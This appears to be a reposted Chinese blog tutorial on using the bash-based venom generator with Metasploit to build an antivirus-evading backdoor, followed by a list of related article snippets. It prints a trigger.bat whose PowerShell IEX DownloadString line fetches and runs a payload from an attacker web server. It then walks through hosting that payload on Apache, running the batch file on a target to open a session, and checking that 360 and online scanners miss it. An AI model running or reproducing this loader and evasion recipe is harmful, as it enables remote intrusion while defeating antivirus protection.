360safe.php绕过,venom结合Metasploit绕过360安全卫士

最新推荐文章于 2022-06-07 17:35:44 发布
最新推荐文章于 2022-06-07 17:35:44 发布
阅读量466 收藏 1
点赞数
文章标签: 360safe.php绕过

原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了

一些 Veil-Evasion.py, unicorn.py, powersploit.py 等工具上的技术。但是venom 是基于 bash 编写的,而不是

基于 Python。相比 veil evasion 在 payload 格式方面,它支持的更多[例如 .msi .hta .vbs .ps1 .dll.php .jar .pdf]而这些 veil evasion 都不支持。

1.从Github上下载框架,你可以下载到以下格式:tar.gz OR zipOR git clone2.赋予文件可执行权限:

cd venom-mainsudo chmod -R +x *.sh

sudo chmod -R +x *.py3.安装依赖关系包:

cd auxsudo ./setup.sh

4.运行sudo ./venom.sh

1f50c44012dd00f8200d35a0ee45bfde.png

下载之后会得到一个zip的压缩包,我们用unzip解压即可

ac47ee0df0643af99a035e1c229187be.png

1、运行venom.sh之后我们可以看到msfvenom的界面是这样的:

40c1ce4f3b14fac14043ca095467d02f.png

2、上图这里的模块比较多,有/apk/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:

1d43ff13c6c1854498c44024ad1dfb68.png

3、在下方输入 11 ,然后按回车键:

900ed7ee0ac1ee953e3074ac929d93ce.png

4、接下来会弹出一个窗口,要求你填写攻击者的 IP 、 端口以及后门名称:

0eef26ab0deb31850ed9b13a30389f6f.png

d522fc1a2390e013dab2ecea819ab187.png

dca72f0cc37c3bc0f93bc5501d70aa22.png

5、在接下来我们要填写后门 选择监听模块类型:

f9836d98a9a36dc32c8d4398b01a7bc5.png

选择完后点击确定

6、在目录我们可以查看 outoput 输出文件:

966ff780a8c416b0d77ffdb8bef85fff.png

两个文件分别是 pitcoft.ps1和trigger.bat

8、这里选择msf的后门模块,选择完后会自动帮你设置相关参数:

475846d0744ed03320d08710024900ac.png

0a46cf1b7ce543c30d7f3a6b97d9b3ce.png

好,我们看到我们的msf已经准备就绪了

b1b99c2be22c1e5a81258c5408f6221a.png

9、下面,我们简单查看下 bat 文件的内容。这里需要我们把 pitcoft.ps1 文件,放到 web 服务器上。 让 powershell去远程下载木马文件:

1 :: powershell template | Author: r00t-3xp10it2 :: Matthew Graeber -DownloadString3 :: Download/execute payload inRAM4 :: ---

5 [url=home.php?mod=space&uid=46675]@echo[/url] off6 echo [*] Please wait, preparing software ...7 powershell.exe IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.105/pitcoft.ps1‘)

10、开启 kali 下的 apache 服务:

1 service apache2 start

f7aab61af1ab5a4c0aaee4161eb31908.png

11、将 pitcoft.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址:

f535e00144145cc3af3b8e8a6391ce1a.png

12、我们只需要 trigger.bat 文件,到目标系统运行一次即可:

2f21d9a61d7c2201388bc230c5119c47.png

ea68b9095d635104a7a30c2548098871.png

可以看到已经成功建立会话了。

最后我们来看一下我们的免杀问题

360安全卫士检测如下:

20b23423c598d5b5001dbe7f756fad08.png

VirSCAN.org-多引擎在线扫描结果:

bd0dbe83ebef0e17d1d952916614c595.png

原文:http://www.cnblogs.com/Pitcoft/p/6309539.html

抹茶奶盖大杯多冰
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 688
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
360 safe.php,360通用php防护代码
weixin_35755640的博客
03-10 771
如果您的网站同php源代码请用360通用php防护代码来保护您网站的安全。使用说明:1.将360_safe3.php传到要包含的文件的目录2.在页面中加入防护有两种做法,根据情况二选一即可:a).在所需要防护的页面加入代码require_once('360_safe3.php');就可以做到页面防注入、跨站如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中!添...
360 safe.php,防止网站被黑,增强网站安全文件:360_safe3.php-防SQL注入代码
weixin_39793553的博客
03-10 1067
这个方法非常有效,是360官方提供的解决方案,就是利用这个文件360_safe3.php来防止sql注入,进一步提升网站数据库安全。很多站长对这个网站安全看得非常重,这个SQL注入漏洞是非常之恨,如果用恨之入骨这个词来形容不足为过;现在有防止SQL代码注入的文件,你会选择不使用么?那就把你的目光聚集到下面重要的步骤吧。代码偏多,无忧主机小编就不在这里展现文件代码,点击此处下载此文件:下载地址。下面...
一段困扰许久的防注入代码
热门推荐
12-18 4万+
有段时间一直热衷于研究各种waf绕过,一般来说,云WAF可以通过找到网站真实IP来绕过,硬件waf也常因为HTTP协议解析差异导致绕过,但是,代码层的防护往往只能从代码逻辑里寻找绕过思路...
360 safe.php,360safe/360webscan.php · 漫步者/quguoren - Gitee.com
weixin_35797090的博客
03-10 800
webscan_error();//引用配置文件require_once('webscan_cache.php');//防护脚本版本号define("WEBSCAN_VERSION", '0.1.2.6');//防护脚本MD5值define("WEBSCAN_MD5", md5(@file_get_contents(__FILE__)));//get拦截规则$getfilter = "\\||\\...
360 safe3.php源码,Safe3 Web漏洞扫描系统
weixin_35502466的博客
03-10 287
Safe3 Web漏洞扫描系统 是保护伞网络推出的网站安全性检测工具,传统的方法往往依靠渗透测试(黑箱、白箱和灰箱测试),这往往局限于测试人员的技术水准高低。系统适用领域:国内金融、证券、银行、电子政务、电子商务、教育、网游、综合行业门户、IDC等网站必备检测工具。技术优势:SQL注入网页抓取网页抓取模块采用广度优先爬虫技术以及网站目录还原技术。广度优先的爬虫技术的不会产生爬虫陷入的问题,可自定义...
php-venom-master
最新发布
03-12
【标题】"php-venom-master" 指的可能是一个PHP项目,名为"php_venom"的主分支或版本。在编程领域,通常使用类似"master"的术语来标识项目的主线或主要版本。这可能是一个开源项目,或者一个用于特定功能或目的的PHP...
奇安信云安全解决方案.pdf
10-30
奇安信云安全解决方案是指在云计算环境中,为了确保业务安全和数据安全而采取的一系列安全措施和解决方案。该解决方案涵盖了云安全建设需求分析、云安全整体解决方案、应用场景与典型案例分享、方案价值与优势等多个...
123Venom.github.io:仓库安装
04-28
【标题】:“123Venom.github.io:仓库安装”涉及的是在个人电脑或智能设备上安装和管理软件仓库的过程,特别提到了“毒液库”(Venom Repository)。这通常指的是一个包含各种第三方插件、附加组件或者脚本的集合,...
venom-源码.rar
10-10
venom-源码.rar】是一个压缩包文件,通常包含了一款名为"venom"的项目的源代码。源代码是程序开发的基础,它由程序员用编程语言编写,用于描述软件的功能、逻辑和实现方式。在深入探讨venom的源码之前,让我们先...
360通用php防护代码
04-18
360通用php防护代码 -----------------使用方法------------------------------------------------------------------ 1.将360_safe3.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('360_safe3.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('360_safe3.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = 360_safe3.php路径;
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET)
09-06
360_safe3通用XSS/SQL防注入源代码(ASP/PHP/C#ASP.NET),下载后,每个开发语言都对应着使用办法,一般是在全站文档中INCLUDE使用。已核实,代码可用且有效,更新到最新版。
360php防护,phpyun注射绕过360防护
weixin_42495504的博客
03-11 237
漏洞作者: Noxxx注册时检测会员是否使用问题model\register.class.php23 行[php]function ajax_reg_action(){$post = array_keys($_POST);$key_name = $post[0];if($key_name=="username"){$username=@iconv("utf-8","gbk",$_POST['use...
如何绕过mac地址过滤_Maccms V8 后台Getshell #2(绕过过滤)
weixin_35612315的博客
12-23 524
### 简要描述:现在 V8版本 基本全部文件都有zend加密了。而且还有360_safe3.php保护刚开始以为没搞头的,结果有个妹子发来微信。妹子:在干嘛?我:挖洞妹子:一个人挖?我:对啊!妹子:我过去陪你一起挖吧!我马上关机。擦,想跟老子抢乌云币?果断一个人作死开挖### 详细说明:注意下,这里@农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 2892
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6
yzddMr6的博客
11-07 2171
前言 感谢大家对webshell-venom的支持 星球自开启以来已经源源不断有各路大佬加入 并且一起交流了很多的思路跟想法 为了不辜负大家的期望 自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更 项目在今天也达到了700个星 image 所以特地推出webshell-venom 3.2版本 webshell-venom 3.2 的蚁剑插件版也已经在蚁剑商...
记一次绕过安全狗与360艰难提权
XunanSec的博客
06-07 1868
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路) 顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
php 绕过gpc,phpyun绕过360艰难的SQL注射
weixin_42131367的博客
03-13 171
漏洞作者: Map我首先发现了一个SQL注射,这个过程也不轻松。在phpyun/model/class/action.class.php中[php]function get_admin_user_shell(){if($_SESSION['auid'] && $_SESSION['ashell']){$row=$this->admin_get_user_shell($_SES...
http://s.safe.360.cn/popwnd/
09-27
根据提供的引用内容,你的电脑遇到了一个广告软件的问题。恶意软件可能通过多种途径进入计算机,例如点击恶意链接、下载未知来源的软件或访问感染的网站。正因为如此,我们需要采取一些措施来解决这个问题。 首先,你可以尝试使用一款专业的杀毒软件对电脑进行全面扫描。你已经安装了瑞星杀毒软件、奇虎360杀毒软件、360卫士和百度卫士,但它们似乎无法解决问题。在这种情况下,我建议你换一个杀毒软件,例如火绒、金山毒霸等。这些杀毒软件可以帮助你检测和清除恶意软件。 另外,你还可以通过卸载一些可疑的软件或浏览器插件来解决问题。在控制面板中,找到并卸载你不熟悉或可疑的软件。对于浏览器插件,你可以打开浏览器的设置,找到插件或扩展管理页面,并禁用或删除可疑插件。 此外,你还可以尝试重置浏览器设置。打开浏览器的设置,找到恢复默认设置或重置设置的选项,并进行操作。这将恢复浏览器的默认设置,包括删除恶意设置和恶意扩展。 最后,为了避免再次受到广告软件的侵扰,我建议你遵循以下几点: 1. 注意点击链接,尤其是来自不信任或未知来源的链接。 2. 谨慎下载和安装软件,尽量从官方网站或可信的来源下载。 3. 定期更新和使用杀毒软件,确保其数据库是最新的。 4. 经常清理浏览器缓存和Cookie,以减少广告软件的机会。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值